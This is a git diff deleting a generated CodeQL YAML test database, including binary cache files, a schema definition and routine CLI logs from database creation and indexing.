9fc567e5c0691ecfc1890d2dc38b0fa83b5e39ea..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 RcmZQzU|?hbf<~j}b^ruC0lxqM diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel deleted file mode 100644 index 573ab48b75431cf7a24d52077aa8a0371ccb9604..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 552 zcmXZZT}whi7)9Z^Pt&Z#N)6J?Oe;}D{K$-m5D_Fqq^m$eM8u1b@YlO{tphLX;h;0l z7($4I|K~tC#8EYlW9l*XyCgnRQ#hfXV}CY-Pt;3%s$StUwSfJ-BEC>dIIUK&*L%QO zwT``B1LxEx&Z{kat#+{YdcxlS1$&)We5<};uk()Y)B*N7LtIuz*uQy6PT_`T2frSa3&%>NXE@BAD4&KKC{TjH*|!anO7`@h>@-~SKx8MnBn K{^DnKhx>avaT2`% diff --git a/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum b/ql/lib/test-db/db-yaml/default/yaml_scalars.rel.checksum deleted file mode 100644 index 7aae4dc38a0fef1277b98a50776a547dd54eafc3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 12 RcmZQzU|?hbf(z-A{{aQN0#N_} diff --git a/ql/lib/test-db/db-yaml/yaml.dbscheme b/ql/lib/test-db/db-yaml/yaml.dbscheme deleted file mode 100755 index 20d83c71ee6..00000000000 --- a/ql/lib/test-db/db-yaml/yaml.dbscheme +++ /dev/null @@ -1,80 +0,0 @@ -/*- YAML -*/ - -#keyset[parent, idx] -yaml (unique int id: @yaml_node, - int kind: int ref, - int parent: @yaml_node_parent ref, - int idx: int ref, - string tag: string ref, - string tostring: string ref); - -case @yaml_node.kind of - 0 = @yaml_scalar_node -| 1 = @yaml_mapping_node -| 2 = @yaml_sequence_node -| 3 = @yaml_alias_node -; - -@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; - -@yaml_node_parent = @yaml_collection_node | @file; - -yaml_anchors (unique int node: @yaml_node ref, - string anchor: string ref); - -yaml_aliases (unique int alias: @yaml_alias_node ref, - string target: string ref); - -yaml_scalars (unique int scalar: @yaml_scalar_node ref, - int style: int ref, - string value: string ref); - -yaml_errors (unique int id: @yaml_error, - string message: string ref); - -yaml_locations(unique int locatable: @yaml_locatable ref, - int location: @location_default ref); - -@yaml_locatable = @yaml_node | @yaml_error; - -/*- Files and folders -*/ - -/** - * The location of an element. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `file`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ -locations_default( - unique int id: @location_default, - int file: @file ref, - int beginLine: int ref, - int beginColumn: int ref, - int endLine: int ref, - int endColumn: int ref -); - -files( - unique int id: @file, - string name: string ref -); - -folders( - unique int id: @folder, - string name: string ref -); - -@container = @file | @folder - -containerparent( - int parent: @container ref, - unique int child: @container ref -); - -/*- Source location prefix -*/ - -/** - * The source location of the snapshot. - */ -sourceLocationPrefix(string prefix : string ref); diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091755.518Z.json deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json b/ql/lib/test-db/diagnostic/cli-diagnostics-add-20240203T091756.033Z.json deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/ql/lib/test-db/log/database-create-20240203.101754.571.log b/ql/lib/test-db/log/database-create-20240203.101754.571.log deleted file mode 100644 index 8c7f3e173b7..00000000000 --- a/ql/lib/test-db/log/database-create-20240203.101754.571.log +++ /dev/null @@ -1,275 +0,0 @@ -[2024-02-03 10:17:54] This is codeql database create ql/lib/test-db -l yaml -s ql/lib/test -[2024-02-03 10:17:54] Log file was started late. -[2024-02-03 10:17:54] [PROGRESS] database create> Initializing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. -[2024-02-03 10:17:54] Running plumbing command: codeql database init --language=yaml --extractor-options-verbosity=1 --qlconfig-file=/Users/pwntester/seclab/projects/actions/codeql-actions/qlconfig.yml --source-root=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --allow-missing-source-root=false --allow-already-existing -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db -[2024-02-03 10:17:54] Calling plumbing command: codeql resolve languages --extractor-options-verbosity=1 --format=betterjson -[2024-02-03 10:17:54] [DETAILS] resolve languages> Scanning for [codeql-extractor.yml] from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/.codeqlmanifest.json -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript/codeql-extractor.yml. -[2024-02-03 10:17:54] [DETAILS] resolve languages> Parsing /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby/codeql-extractor.yml. -[2024-02-03 10:17:54] Plumbing command codeql resolve languages completed: - { - "aliases" : { - "c" : "cpp", - "c++" : "cpp", - "c-c++" : "cpp", - "c-cpp" : "cpp", - "c#" : "csharp", - "java-kotlin" : "java", - "kotlin" : "java", - "javascript-typescript" : "javascript", - "typescript" : "javascript" - }, - "extractors" : { - "go" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/go" - } - ], - "python" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/python", - "extractor_options" : { - "logging" : { - "title" : "Options pertaining to logging.", - "description" : "Options pertaining to logging.", - "type" : "object", - "properties" : { - "verbosity" : { - "title" : "Python extractor logging verbosity level.", - "description" : "Controls the level of verbosity of the CodeQL Python extractor.\nThe supported levels are (in order of increasing verbosity):\n\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", - "type" : "string", - "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" - } - } - } - } - } - ], - "java" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/java", - "extractor_options" : { - "exclude" : { - "title" : "A glob excluding files from analysis.", - "description" : "A glob indicating what files to exclude from the analysis.\n", - "type" : "string" - }, - "add_prefer_source" : { - "title" : "Whether to always prefer source files over class files.", - "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction (experimental).", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "html" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/html" - } - ], - "xml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/xml" - } - ], - "properties" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/properties" - } - ], - "cpp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/cpp", - "extractor_options" : { } - } - ], - "swift" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/swift" - } - ], - "csv" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csv" - } - ], - "yaml" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml" - } - ], - "csharp" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/csharp", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip|brotli)$" - } - } - }, - "buildless" : { - "title" : "Whether to use buildless (standalone) extraction.", - "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", - "type" : "string", - "pattern" : "^(false|true)$" - }, - "cil" : { - "title" : "Whether to enable CIL extraction.", - "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "javascript" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/javascript", - "extractor_options" : { - "skip_types" : { - "title" : "Skip type extraction for TypeScript", - "description" : "Whether to skip the extraction of types in a TypeScript application", - "type" : "string", - "pattern" : "^(false|true)$" - } - } - } - ], - "ruby" : [ - { - "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/ruby", - "extractor_options" : { - "trap" : { - "title" : "Options pertaining to TRAP.", - "description" : "Options pertaining to TRAP.", - "type" : "object", - "properties" : { - "compression" : { - "title" : "Controls compression for the TRAP files written by the extractor.", - "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", - "type" : "string", - "pattern" : "^(none|gzip)$" - } - } - } - } - } - ] - } - } -[2024-02-03 10:17:54] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test -[2024-02-03 10:17:54] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. -[2024-02-03 10:17:54] [DETAILS] database init> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . -[2024-02-03 10:17:54] [PROGRESS] database init> Calculated baseline information for languages: (53ms). -[2024-02-03 10:17:54] [PROGRESS] database init> Resolving extractor yaml. -[2024-02-03 10:17:54] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:54] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml. -[2024-02-03 10:17:54] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. This in-progress database is ready to be populated by an extractor. -[2024-02-03 10:17:54] Plumbing command codeql database init completed. -[2024-02-03 10:17:54] [PROGRESS] database create> Running build command: [] -[2024-02-03 10:17:54] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --index-traceless-dbs --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db -[2024-02-03 10:17:54] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh. -[2024-02-03 10:17:54] [PROGRESS] database trace-command> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/autobuild.sh] -[2024-02-03 10:17:55] [build-stderr] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... -[2024-02-03 10:17:55] [build-stderr] /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... -[2024-02-03 10:17:55] [build-stderr] Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list] -[2024-02-03 10:17:55] Plumbing command codeql database trace-command completed. -[2024-02-03 10:17:55] [PROGRESS] database create> Finalizing database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. -[2024-02-03 10:17:55] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db -[2024-02-03 10:17:55] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db... -[2024-02-03 10:17:55] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/yaml.dbscheme -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml -[2024-02-03 10:17:55] Clearing disk cache since the version file /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache/version does not exist -[2024-02-03 10:17:55] Tuple pool not found. Clearing relations with cached strings -[2024-02-03 10:17:55] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode clear. -[2024-02-03 10:17:55] Sequence stamp origin is -6222583512417648685 -[2024-02-03 10:17:55] Pausing evaluation to hard-clear memory at sequence stamp o+0 -[2024-02-03 10:17:55] Unpausing evaluation -[2024-02-03 10:17:55] Pausing evaluation to quickly trim disk at sequence stamp o+1 -[2024-02-03 10:17:55] Unpausing evaluation -[2024-02-03 10:17:55] Pausing evaluation to zealously trim disk at sequence stamp o+2 -[2024-02-03 10:17:55] Unpausing evaluation -[2024-02-03 10:17:55] Trimming completed (7ms): Purged everything. -[2024-02-03 10:17:55] Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/trap/yaml -[2024-02-03 10:17:55] Found 2 TRAP files (2.87 KiB) -[2024-02-03 10:17:55] [PROGRESS] dataset import> Importing TRAP files -[2024-02-03 10:17:55] Importing test.yml.trap.gz (1 of 2) -[2024-02-03 10:17:55] Importing sourceLocationPrefix.trap.gz (2 of 2) -[2024-02-03 10:17:55] [PROGRESS] dataset import> Merging relations -[2024-02-03 10:17:55] Merging 1 fragment for 'files'. -[2024-02-03 10:17:55] Merged 8 bytes for 'files'. -[2024-02-03 10:17:55] Merging 1 fragment for 'folders'. -[2024-02-03 10:17:55] Merged 80 bytes for 'folders'. -[2024-02-03 10:17:55] Merging 1 fragment for 'containerparent'. -[2024-02-03 10:17:55] Merged 80 bytes for 'containerparent'. -[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_scalars'. -[2024-02-03 10:17:55] Merged 552 bytes for 'yaml_scalars'. -[2024-02-03 10:17:55] Merging 1 fragment for 'yaml'. -[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'yaml'. -[2024-02-03 10:17:55] Merging 1 fragment for 'locations_default'. -[2024-02-03 10:17:55] Merged 1416 bytes (1.38 KiB) for 'locations_default'. -[2024-02-03 10:17:55] Merging 1 fragment for 'yaml_locations'. -[2024-02-03 10:17:55] Merged 472 bytes for 'yaml_locations'. -[2024-02-03 10:17:55] Merging 1 fragment for 'sourceLocationPrefix'. -[2024-02-03 10:17:55] Merged 4 bytes for 'sourceLocationPrefix'. -[2024-02-03 10:17:55] Saving string and id pools to disk. -[2024-02-03 10:17:55] Finished importing TRAP files. -[2024-02-03 10:17:55] Read 13.45 KiB of uncompressed TRAP data. -[2024-02-03 10:17:55] Relation data size: 3.93 KiB (merge rate: 52.86 KiB/s) -[2024-02-03 10:17:55] String pool size: 2.05 MiB -[2024-02-03 10:17:55] ID pool size: 1.03 MiB -[2024-02-03 10:17:55] [PROGRESS] dataset import> Finished writing database (relations: 3.93 KiB; string pool: 2.05 MiB). -[2024-02-03 10:17:55] Pausing evaluation to close the cache at sequence stamp o+3 -[2024-02-03 10:17:55] The disk cache is freshly trimmed; leave it be. -[2024-02-03 10:17:55] Unpausing evaluation -[2024-02-03 10:17:55] Plumbing command codeql dataset import completed. -[2024-02-03 10:17:55] [PROGRESS] database finalize> TRAP import complete (447ms). -[2024-02-03 10:17:55] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db -[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... -[2024-02-03 10:17:56] [PROGRESS] database cleanup> TRAP files cleaned up (4ms). -[2024-02-03 10:17:56] [PROGRESS] database cleanup> Cleaning up scratch directory... -[2024-02-03 10:17:56] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms). -[2024-02-03 10:17:56] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml -[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml. -[2024-02-03 10:17:56] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml/default/cache in mode trim. -[2024-02-03 10:17:56] Sequence stamp origin is -6222583510647662597 -[2024-02-03 10:17:56] Pausing evaluation to zealously trim disk at sequence stamp o+0 -[2024-02-03 10:17:56] Unpausing evaluation -[2024-02-03 10:17:56] Trimming completed (3ms): Trimmed disposable data from cache. -[2024-02-03 10:17:56] Pausing evaluation to close the cache at sequence stamp o+1 -[2024-02-03 10:17:56] The disk cache is freshly trimmed; leave it be. -[2024-02-03 10:17:56] Unpausing evaluation -[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. -[2024-02-03 10:17:56] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml -[2024-02-03 10:17:56] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/db-yaml (5ms). -[2024-02-03 10:17:56] Plumbing command codeql dataset cleanup completed. -[2024-02-03 10:17:56] Plumbing command codeql database cleanup completed with status 0. -[2024-02-03 10:17:56] [PROGRESS] database finalize> Finished zipping source archive (578.00 B). -[2024-02-03 10:17:56] Plumbing command codeql database finalize completed. -[2024-02-03 10:17:56] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db. -[2024-02-03 10:17:56] Terminating normally. diff --git a/ql/lib/test-db/log/database-index-files-20240203.101755.239.log b/ql/lib/test-db/log/database-index-files-20240203.101755.239.log deleted file mode 100644 index 858ec59a13d..00000000000 --- a/ql/lib/test-db/log/database-index-files-20240203.101755.239.log +++ /dev/null @@ -1,15 +0,0 @@ -[2024-02-03 10:17:55] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db -[2024-02-03 10:17:55] Log file was started late. -[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. -[2024-02-03 10:17:55] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... -[2024-02-03 10:17:55] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test --format=json -[2024-02-03 10:17:55] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... -[2024-02-03 10:17:55] Plumbing command codeql resolve files completed: - [ - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test/test.yml" - ] -[2024-02-03 10:17:55] [DETAILS] database index-files> Found 1 files. -[2024-02-03 10:17:55] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test... -[2024-02-03 10:17:55] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. -[2024-02-03 10:17:55] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/lib/test-db/working/files-to-index13033409879197263775.list] -[2024-02-03 10:17:55] Terminating normally. diff --git a/ql/lib/test-db/src.zip b/ql/lib/test-db/src.zip deleted file mode 100644 index 3dbf073c49924685cbbad30b59944af574c77ae9..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 578 zcmWIWW@Zs#;Nak3unBUGU_b)iKz3+xYEiL%L3v(DYH>+wk$!P%a!z8BenC-wR%&ud zv3_E5NoIatv3_!XN@`(_E{t24qo0$Rqz}>rCiE(Eb6SH=7admM+4Ebw}@-&*HCX*mO-(<>9jurcV|DmT#ZViIkhd$??4S(D4@jEe#GH zLQ}rY-Mre`mRS<8;aoAyhp>O}l|q-Aya^WjAv z%^yDeS19qFwD3&e-ivQz|0Q-uY`&Q}r|!?E8*|RR+su$Qv0+zf@ZJtR^@49DGYywj zum^ava}-DO?zLiMVA#RLz!2cg$Rxsmh%{t5P^6&(Dn?;|H!B;+a7G}k1k#&<4q{*c E0HyckLI3~& diff --git a/ql/src/test-db/baseline-info.json b/ql/src/test-db/baseline-info.json deleted file mode 100644 index 9e26dfeeb6e..00000000000 --- a/ql/src/test-db/baseline-info.json +++ /dev/null @@ -1 +0,0 @@ -{} \ No newline at end of file diff --git a/ql/src/test-db/codeql-database.yml b/ql/src/test-db/codeql-database.yml deleted file mode 100644 index 1dedebb70be..00000000000 --- a/ql/src/test-db/codeql-database.yml +++ /dev/null @@ -1,10 +0,0 @@ ---- -sourceLocationPrefix: /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test -baselineLinesOfCode: 0 -unicodeNewlines: false -columnKind: utf16 -primaryLanguage: yaml -creationMetadata: - cliVersion: 2.16.1 - creationTime: 2024-02-03T09:17:52.592220Z -finalised: true diff --git a/ql/src/test-db/db-yaml/default/cache/.lock b/ql/src/test-db/db-yaml/default/cache/.lock deleted file mode 100644 index e69de29bb2d..00000000000 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/info deleted file mode 100644 index 0111728636533e2c31d7b0489e64f46bcd4d6cf2..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>$5|AY89zRa8gqUTSZdItbEj0T|q diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/buckets/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/ids1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/indices1/info deleted file mode 100644 index 799471fd4d54d409c98d3b7826deaac67913dc99..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#Q>!l|AY89zRa8gqGzYMJ_GYwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/info deleted file mode 100644 index 9c1ea6cdeb296b714876d0e928d9978e9ec788c9..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 41 ZcmZQz00U+S1tA%s91sm=%ij{e1^@)e0qp<) diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/info deleted file mode 100644 index 9cdb710dfd9490f67f5103cbab69eb12829f96b4..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 40 ecmZQz00Tw{#lZL<3PAiDUuI4L(W_e5uLA(d%ME}4 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/metadata/page-000000 deleted file mode 100644 index 6d17cf9d15fb9f4a2358a2d079f3b8c755d005fa..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 8192 zcmeIu0Sy2E0K%a6Pi+o2h(KY$fB^#r3>YwAz<>b*1`HT5V8DO@0|pEjFkrxd0RsjM GyblZ@00031 diff --git a/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 b/ql/src/test-db/db-yaml/default/cache/cached-strings/pools/0/pageDump/page-000000000 deleted file mode 100644 index 7bccaeb20c898fd660036bab54ae98c20280d0a3..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 1048592 zcmeIuF%bYT48*X95C8>I#^n|iy>Q4V1Mr|k1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 